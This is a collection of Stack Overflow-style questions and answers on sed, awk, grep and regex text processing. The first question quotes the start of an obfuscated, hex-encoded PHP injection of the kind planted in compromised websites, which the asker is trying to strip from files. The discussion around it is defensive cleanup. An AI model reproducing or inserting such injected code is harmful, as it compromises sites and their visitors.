I want to write a sed script to search for this pattern and delete it. However, whatever I write ends up failing due to some of these special characters. Is there a way to search for this as a string literal and replace with nothing?
What I have tried so far is:
sed -i 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; First put the string in a file (remove.txt), then run this code:
echo "$(grep -vFf remove.txt phpmainfile.php)" >phpmainfile.php
This will overwrite phpmainfile.php.
To check if it works, dump the output into another file or omit the redirection to print on stdout or make a backup.
If you want to do this recursively then you can use a for loop to process each file like this:
for file in folderpath/*.php;do
echo "$(grep -vFf remove.txt "$file")" >"$file"
done
If you want to do this recursively in subdirectories too, then:
shopt -s globstar
for file in folderpath/*.php folderpath/**/*.php;do
...

AWK replace string in file with javascript code
I want to replace a constant javascript line in awk with some code I read from a file . Interactively running this at the command line in bash works: CUSTOM_CODE=`cat custom_code.txt` awk -v r=$CUSTOM_CODE '{gsub(/export default function\(\) \{/,r)}1' main.js > main-patched.js The problem is that if I place this 2 commands in a bash file it doesn't work anymore with the following awk error :awk: cannot open myobj (No such file or directory). Sample files : main.js import asdas form "asdasdsa" export default function() { let a ="asdasd" } custom_code.txt const myobj = { aaaa: bbb.asdasd("12345"), aaa2: 1 } function myfunction(params){ //1 // comment let var1 ="a"
Copy/paste your script into http://shellcheck.net and it'll explain the error message you're getting (hint - always quote your shell variables) and more. It is impossible for the code you posted to work on the command line or in a script. The right way to do this is read the new code into an awk variable (not a shell variable) and then do a string match and replace (not *sub() as that'd fail given & in the new code and would need you to escape the regexp metachars) in the main file: $ awk ' NR==FNR { new=new sep $0; sep=ORS; next } $0=="export default function() {" { $0=new } { print } ' custom_code.txt main.js > main-patched.js $ cat main-patched.js import asdas form "asdasdsa" const myobj = { aaaa: bbb.asdasd("12345"), aaa2: 1 } function myfunction(params){ //1 // comment let var1 ="a" let a ="asdasd" }
Grouping Regex Output According to Directory Name
I was trying to write a bash script in order to apply regex on this file. somedir1/include/log.h:65:inline void ERROR(int, const std::string&) {} somedir1/common/packet.cpp:68: ERROR(1, "File couldn't be opened"); anotherdir2/core/client.cpp:380: ERROR(error, "Connection error"); otherdir3/src/client.cpp:534: ERROR(1, "Wrong command"); However, I cannot manage to collect the directory names as variable. Last stable regex material I have is: [^,]*\/[^,]*:[0-9]*:[^,].*\n #[^,]--->This one is the one I am interested in. My goal is to group the entries that share the same parent directory in same file. For instance; fileName: report_somedir1 content: somedir1/include/log.h:65:inline void ERROR(int, const std::string&) {} content: somedir1/common/packet.cpp:68: ERROR(1, "File couldn't be opened"); What is the correct way to store the first pattern as a variable? Thank you in advance, for your time and patience.
Try this: awk -F/ '$1 != d{close(f); d=$1; f="report_"d} {print >>f}' file The above command will result in the creation of three files: $ cat report_somedir1 somedir1/include/log.h:65:inline void ERROR(int, const std::string&) {} somedir1/common/packet.cpp:68: ERROR(1, "File couldn't be opened"); And: $ cat report_anotherdir2 anotherdir2/core/client.cpp:380: ERROR(error, "Connection error"); And: $ cat report_otherdir3 otherdir3/src/client.cpp:534: ERROR(1, "Wrong command"); How it works -F/ This sets the field divider to /. In this way, the first field will be the directory. $1 != d{close(f); d=$1; f="report_"d} If the first field of the current line differs from the previous, then close the old file, update the variable d and create a new filename f. print >>f Print the current line to file f.
Cakephp Files and Folder class with regex to search for file
I am creating some sort of shell for removing backup files. I use to create backup of original file using keyword 'bkp'. It could be anywhre in file name either like this ["abc.bkp.ctp", "abc-bkp.ctp", abc_bkp.ctp", "bkp_abc.ctp"]. I mean any way. I wish to remove all files using shell. I am using Cakephp's Files N Folder Class "http://book.cakephp.org/2.0/en/core-utility-libraries/file-folder.html". How would I write regex to search for these files. Whats my shell logic is. public function removeBkp() { $path = BASE_PATH . DS . APP_DIR . DS; $count = 0; $this->out("", 2); $this->out("-------------------------------------", 1); $this->out("Path : " . $path, 1); $this->out("FILES DETAILS", 1); $this->out("-------------------------------------", 2); $dir = new Folder($path); // Need to seach bkp files here $defaultFiles = $dir->findRecursive("(bkp)"); $results = $defaultFiles; if ($results == null || empty($results)) { $this->out("No file to delete.", 3); } else { foreach ($results as $file) { // unlink($file); $this->out("File removed - " . $file, 1); $count++; } $this->out("Total files: " . count($results), 1); } }
You can match all filenames with this regex: ([\w._-]*bkp[\S]*?\.ctp) Assuming only ._- are used to split the files up, you may need to add more to that character class. This regex also assumes that the file always ends with ctp. Demo: https://regex101.com/r/tB9nM9/1 EDIT: If you wish to match any extension, you can generalise the extension with \w{3}. Where 3 is the length, you can add variance here if needed, but more specific is usually better. ([\w._-]*bkp[\S]*\.\w{3}) DEMO: https://regex101.com/r/tB9nM9/2
Use a Dynamic pattern in grep from a file
So here is the issue. I have a file say A.java. Now don't bother about syntax. But here is what I aim to achieve. import com.random.OrderSRO; import com.random.SuborderSRO; public A { public void doRandom(){ OrderSRO orderSRO = service.getOrderByCode(request).getOrderSRO(); oEDTO.setCustomerName(orderSRO.getCustomerName()); for (SuborderSRO suborderSRO : orderSRO.getSuborders()) { SOI undeliveredSOI = iShService.getSOIBySuborder(suborderSRO.getCode()); oEDTO.setSuborders(allSuborders); oEDTO.setShDetail(pack.getShDetail()); oEDTO.setShMethod(pack.getShMethod().getCode()); oEDTO.setPurchaseDate(DateUtils.dateToString(orderSRO.getCreated(), "yyyy-MM-dd HH:mm:ss")); oEDTO.setTotalAmount(orderSRO.getSellingPrice()); oEDTO.setPaidAmount(orderSRO.getPaidAmount()); oEDTO.setSdCash(orderSRO.getSdCash()); oEDTO.setShDetailsRequired(true); } public void doRandom1() { OrderSRO orderSRO1 = service.getOrderByCode(request).getOrderSRO(); oEDTO.setPurchaseDate(DateUtils.dateToString(orderSRO1.getCreated(), "yyyy-MM-dd HH:mm:ss")); oEDTO.setTotalAmount(orderSRO1.getSellingPrice()); oEDTO.setPaidAmount(orderSRO1.getPaidAmount()); oEDTO.setSdCash(orderSRO1.getSdCash()); } } I need to check what methods of OrderSRO are being used in A.java. Let me explain the method that I use. So I need to check for patterns like OrderSRO orderSRO = orderClientService.getOrderByCode(request).getOrderSRO(); Now I have variable orderSRO available. I need to now again grep this variable in the same file A.java Although I have been able to achieve it but my method is not clean. Wondering if it can be done smartly, say in one line grep -o 'OrderSRO .*=' EmailServiceImpl.java | awk '{ct[$2];} END {for (var in ct) {str=str "|" var "\\.[a-zA-Z]*"};print str}' >> pat2.txt cat pat2.txt. This gives me orderSRO1\.[a-zA-Z]*|orderSRO\.[a-zA-Z]* grep -Ewof pat2.txt A.java | sort -u orderSRO.getCode orderSRO.getCreated orderSRO.getCustomerName orderSRO.getMobile orderSRO.getPaidAmount orderSRO.getSdCash orderSRO.getSellingPrice orderSRO.getSuborders orderSRO1.getMobile orderSRO1.getPaidAmount orderSRO1.getSdCash orderSRO1.getSellingPrice orderSRO1.getSuborders
I can't help myself. Here's an extremely custom awk script: awk -F"[.]*OrderSRO[ ]*|[ ]*=" 'NF>2 {a[$2]; next} {for( i in a ) {c=split($0, line, i".|[(][)]"); if(c==3&&line[2]!~/^\./) print i"."line[2]}}' A.java which yields: orderSRO.getCustomerName orderSRO.getSuborders orderSRO.getCode orderSRO.getCreated orderSRO.getSellingPrice orderSRO.getPaidAmount orderSRO.getSdCash orderSRO1.getCreated orderSRO1.getSellingPrice orderSRO1.getPaidAmount orderSRO1.getSdCash where method calls are in file order and has at least the following assumptions: Variable declarations are one to a line The method calls are for POJO getters w/o args Said getter calls are one to a line It doesn't match the question output because things like orderSRO.getMobile() don't exist in the sample A.java. Here's a multi-line view: awk -F"[.]*OrderSRO[ ]*|[ ]*=" ' NF>2 {a[$2]; next} { for( i in a ) { c=split($0, line, i".|[(][)]") if(c==3&&line[2]!~/^\./) print i"."line[2] } }' A.java which can be translated like: Set FS to find the variable name when NF>2 when NF>2, add the variable name to an array, don't attempt to process the line For every line that's not a variable name, process it split() the line on variable name + "." or "()" ( which is why this only works for no arg getters ) When the split() count (c) is 3, the 2nd element should be the getter except when "()" leads to a false positive, so throw out methods that start with "." print out the variable name followed by a "." and the no arg getter method name. If you have to do this all the time, you're better off using something that understands code natively. That said, I can't think of a way to do this in Eclipse w/o multiple searches.
Text Pattern Processing in paragraph with unix linux utilities
I have a file with the following pattern (please note this is a file generated using sed, awk, grep etc processing). The part of file input is as follows. filename1, BASE=a/b/c CONFIG=$BASE/d propertiesfile1=$CONFIG/e.properties EndOfFilefilename1 filename2, BASE=f/g/h CONFIG=$BASE/i propertiesfile1=$CONFIG/j.properties EndOfFilefilename2 filename3, BASE=k/l/m CONFIG=$BASE/n propertiesfile1=$CONFIG/o.properties EndOfFilefilename3 I want the output like filename1,a/b/c/d/e.properties, filename2,f/g/h/i/j.properties, filename3, k/l/m/n/o.properties, I could not find a solution with sed or awk or grep. So I ams tuck. Please do let me know if you know the solution with these unix utilities or any other language, platform. Regards, Suhaas
Assuming you generated the original file, and therefore it is safe to execute it as a script: sed -e 's/^.*,/FILE=&/' \ -e 's/^.*=\$CONFIG/PROPFILE=$CONFIG/' \ -e 's/^EndOfFile.*/echo $FILE $PROPFILE/' < yourInputFile | sh This converts each section of your file into the form: FILE=filename1, BASE=a/b/c CONFIG=$BASE/d PROPFILE=$CONFIG/e.properties echo $FILE $PROPFILE ... and then sends it into a shell for processing. Line-by-line explanation: Line 1: Searches for the lines ending in a comma (the filenames), and sets FILE to the name. Line 2: Searches for lines that set the properties file, and renames the variable to PROPFILE. Line 3: Replaces the EndOfFile lines with a command to echo the file name and the properties file, then pipes it into a shell.
This is an excellent use case for structural regular expressions, which have been implemented as a python library, amongst other places. Here's an article which descibes how to emulate SREs in Perl.
And here is an awk script to process that input and generate what you want: BEGIN { FS="=" state = 0; base = ""; config = ""; prop = ""; filename = ""; dbg = 0; } /^BASE=/ { if (dbg) { print "BASE"; print $0; } if (state != 1) { print "Error base!"; exit 1; } state++; base = $2; if (dbg > 1) printf ("BASE = %s\n", base); } /^CONFIG=/ { if (dbg) { print "CONFIG"; print $0; } if (state != 2) { print "Error config!"; exit 1; } state++; config = $2; sub (/\$BASE/, base, config); if (dbg > 1) printf ("CONFIG = %s\n", config); } /^propertiesfile1=/ { if (dbg) { print "PROP"; print $0; } if (state != 3) { print "Error pF!"; exit 1; } state++; prop = $2; sub (/\$CONFIG/, config, prop); } /^EndOfFile/ { if (dbg) { print "EOF"; print $0; } if (state != 4) { print "Error EOF!"; print state; exit 1; } state = 0; printf ("%s%s,\n", filename, prop); } /,$/{ if (dbg) { print "FILENAME"; print $0; } if (state != 0) { print "Error filename!"; print state; exit 1; } state++; filename = $1; }
gawk gawk -vRS= 'BEGIN{FS="BASE[=]?|CONFIG|\n"} { s=$1 for(i=1;i<=NF;i++){ if($i~/\// ){ s=s $i } } print s s="" }' file output $ more file filename1, BASE=a/b/c CONFIG=$BASE/d propertiesfile1=$CONFIG/e.properties EndOfFilefilename1 filename2, BASE=f/g/h CONFIG=$BASE/i propertiesfile1=$CONFIG/j.properties EndOfFilefilename2 filename3, BASE=k/l/m CONFIG=$BASE/n propertiesfile1=$CONFIG/o.properties EndOfFilefilename3 $ ./shell.sh filename1,a/b/c/d/e.properties filename2,f/g/h/i/j.properties filename3,k/l/m/n/o.properties
A perl script that does what you want would be something like (note this is untested) while (<>) { $base = $1 if (m/BASE=(.+)/); $config = $1 if (m/CONFIG=(.+)/); if (m/propertiesfile1=(.+)/) { $props = $1; $props =~ m/\$CONFIG/$config/; $props =~ m/\$BASE/$base/; print $ARGV . ", " . $props . "\n"; } } you give the script the filenames as arguments.
Multi-steps but it works! cat yourInputFile | egrep ',|\/' | \ sed -e "s/^.*=//g" -e "s/\$.*\(\/.*\)/\1/g" | \ awk '{if($0 ~ "properties") print $0; else printf $0}' The egrep grabs the lines containing a "," or a "/" and so eliminates the last line: BASE=a/b/c CONFIG=$BASE/d propertiesfile1=$CONFIG/e.properties The sed reduces the output to: filename1, a/b/c /d /e.properties The awk portion reassembles the line to: filename1,a/b/c/d/e.properties
